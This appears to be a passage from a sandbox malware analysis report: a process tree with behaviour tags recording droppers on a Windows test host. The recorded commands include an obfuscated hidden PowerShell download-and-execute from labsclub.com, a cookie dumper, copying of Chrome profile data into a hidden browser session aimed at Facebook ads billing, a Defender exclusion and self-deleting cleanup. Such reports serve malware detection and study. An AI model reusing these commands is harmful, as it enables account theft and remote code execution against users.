        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8076 /prefetch:8
        15⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
        12⤵
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
        12⤵
        
        PID:364
        
        C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
        12⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        12⤵
        
        PID:7004
        
        C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"
        13⤵
        
        PID:7512
        
        C:\Users\Admin\AppData\Local\Temp\hrxwjr5gper\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hrxwjr5gper\askinstall24.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:812
        
        C:\Users\Admin\AppData\Local\Temp\naj1gxkjfwy\b3bgwkopxvm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\naj1gxkjfwy\b3bgwkopxvm.exe" /ustwo INSTALL
        8⤵
        Executes dropped EXE
        
        PID:5104
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "b3bgwkopxvm.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\naj1gxkjfwy\b3bgwkopxvm.exe" & exit
        9⤵
        
        PID:5388
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "b3bgwkopxvm.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:5608
        
        C:\Users\Admin\AppData\Local\Temp\y1g1rlo1u2p\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\y1g1rlo1u2p\vict.exe" /VERYSILENT /id=535
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7304
        
        C:\Users\Admin\AppData\Local\Temp\is-6KQI9.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6KQI9.tmp\vict.tmp" /SL5="$2C045A,870426,780800,C:\Users\Admin\AppData\Local\Temp\y1g1rlo1u2p\vict.exe" /VERYSILENT /id=535
        9⤵
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:6852
        
        C:\Users\Admin\AppData\Local\Temp\is-ETMUD.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-ETMUD.tmp\wimapi.exe" 535
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6316
        
        C:\Users\Admin\AppData\Local\Temp\0iuuo401rtv\AwesomePoolU1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0iuuo401rtv\AwesomePoolU1.exe"
        8⤵
        
        PID:3952
        
        C:\Users\Admin\AppData\Local\Temp\cr5h5p5bz0y\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cr5h5p5bz0y\Setup3310.exe" /Verysilent /subid=577
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6548
        
        C:\Users\Admin\AppData\Local\Temp\is-R7H4L.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-R7H4L.tmp\Setup3310.tmp" /SL5="$20550,138429,56832,C:\Users\Admin\AppData\Local\Temp\cr5h5p5bz0y\Setup3310.exe" /Verysilent /subid=577
        9⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:152
        
        C:\Users\Admin\AppData\Local\Temp\is-VIGDQ.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-VIGDQ.tmp\Setup.exe" /Verysilent
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:648
        
        C:\Users\Admin\AppData\Local\Temp\is-6HEG0.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6HEG0.tmp\Setup.tmp" /SL5="$60312,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-VIGDQ.tmp\Setup.exe" /Verysilent
        11⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:6864
        
        C:\Users\Admin\AppData\Local\Temp\is-21Q6S.tmp\Delta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-21Q6S.tmp\Delta.exe" /Verysilent
        12⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7276
        
        C:\Users\Admin\AppData\Local\Temp\is-949RI.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-949RI.tmp\Delta.tmp" /SL5="$204F2,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-21Q6S.tmp\Delta.exe" /Verysilent
        13⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:6692
        
        C:\Users\Admin\AppData\Local\Temp\is-IMH60.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-IMH60.tmp\Setup.exe" /VERYSILENT
        14⤵
        Loads dropped DLL
        Checks processor information in registry
        Suspicious use of SetWindowsHookEx
        
        PID:3900
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-IMH60.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
        15⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Setup.exe /f
        16⤵
        Kills process with taskkill
        
        PID:1740
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        16⤵
        Delays execution with timeout.exe
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\is-21Q6S.tmp\PictureLAb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-21Q6S.tmp\PictureLAb.exe" /Verysilent
        12⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7132
        
        C:\Users\Admin\AppData\Local\Temp\is-OFJDA.tmp\PictureLAb.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OFJDA.tmp\PictureLAb.tmp" /SL5="$1100480,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-21Q6S.tmp\PictureLAb.exe" /Verysilent
        13⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:1820
        
        C:\Users\Admin\AppData\Local\Temp\is-L03CF.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-L03CF.tmp\Setup.exe" /VERYSILENT
        14⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5708
        
        C:\Users\Admin\AppData\Local\Temp\is-4K8GK.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4K8GK.tmp\Setup.tmp" /SL5="$120524,568550,484864,C:\Users\Admin\AppData\Local\Temp\is-L03CF.tmp\Setup.exe" /VERYSILENT
        15⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:4728
        
        C:\Users\Admin\AppData\Local\Temp\is-K314G.tmp\RAsh.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-K314G.tmp\RAsh.exe" /S /UID=lab214
        16⤵
        Drops file in Drivers directory
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\6b-b1ffd-d2c-5a19f-ce230e6f4b706\Wivopijusy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6b-b1ffd-d2c-5a19f-ce230e6f4b706\Wivopijusy.exe"
        17⤵
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\is-21Q6S.tmp\hjjgaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-21Q6S.tmp\hjjgaa.exe" /Verysilent
        12⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6772
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        Suspicious use of SetWindowsHookEx
        
        PID:300
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:5920
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\cy5o2w5xaqq\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cy5o2w5xaqq\askinstall24.exe"
        8⤵
        Drops Chrome extension
        Suspicious use of SetWindowsHookEx
        
        PID:3276
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:6320
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:3176
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
        9⤵
        Enumerates system info in registry
        
        PID:7668
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
        9⤵
        
        PID:7768
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7fff7d126e00,0x7fff7d126e10,0x7fff7d126e20
        10⤵
        Drops file in Program Files directory
        
        PID:7824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1652 /prefetch:8
        10⤵
        
        PID:8180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2224 /prefetch:8
        10⤵
        
        PID:3184
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1604 /prefetch:2
        10⤵
        
        PID:756
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2740 /prefetch:1
        10⤵
        
        PID:7236
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:1
        10⤵
        
        PID:588
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
        10⤵
        
        PID:7956
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
        10⤵
        
        PID:5372
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1
        10⤵
        
        PID:7112
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
        10⤵
        
        PID:5592
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5064 /prefetch:8
        10⤵
        
        PID:7816
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5084 /prefetch:8
        10⤵
        
        PID:7856
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5000 /prefetch:8
        10⤵
        
        PID:6488
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1668 /prefetch:8
        10⤵
        
        PID:6860
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2004 /prefetch:8
        10⤵
        
        PID:8100
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1540,605524961788502009,12058736026097136143,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3860 /prefetch:2
        10⤵
        
        PID:6984
        
        C:\Users\Admin\AppData\Local\Temp\r15o1k0v4zk\laxtbg3mutv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\r15o1k0v4zk\laxtbg3mutv.exe" /ustwo INSTALL
        8⤵
        
        PID:2312
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "laxtbg3mutv.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\r15o1k0v4zk\laxtbg3mutv.exe" & exit
        9⤵
        
        PID:6752
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "laxtbg3mutv.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:7040
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1320
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3692
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4116
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4268
    - - C:\Users\Admin\AppData\Roaming\6A97.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\6A97.tmp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4480
      - C:\Users\Admin\AppData\Roaming\6A97.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\6A97.tmp.exe"
        6⤵
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4600
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        
        PID:4680
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:4332
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      PID:4620
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:5016
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:4376
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:6076
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:860
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:6448

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
1⤵
PID:4772
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im chrome.exe
  2⤵
  - Kills process with taskkill
  PID:4300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Shy-Thunder"
1⤵
PID:2556

C:\Users\Admin\AppData\Local\Temp\is-3B3BE.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-3B3BE.tmp\wimapi.exe" 535
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4476
- C:\Users\Admin\AppData\Local\Temp\3tz26HrLg.exe
  "C:\Users\Admin\AppData\Local\Temp\3tz26HrLg.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5532
- - C:\Users\Admin\AppData\Local\Temp\3tz26HrLg.exe
    "C:\Users\Admin\AppData\Local\Temp\3tz26HrLg.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    PID:5856
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
  2⤵
  PID:3792
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
    3⤵
    PID:2500

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1560

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4000

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5600

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:5844

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5788

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:5812
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{3bc62ee9-bbbb-0449-87fd-2d469510da0d}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies data under HKEY_USERS
  PID:4448
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
  2⤵
  - Drops file in Drivers directory
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  PID:6048

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:6132

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:6112

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:4692
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:5892

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4812

C:\Program Files (x86)\Picture Lab\Pictures Lab.exe
"C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"
1⤵
PID:4260

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5640

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4304

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4512

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
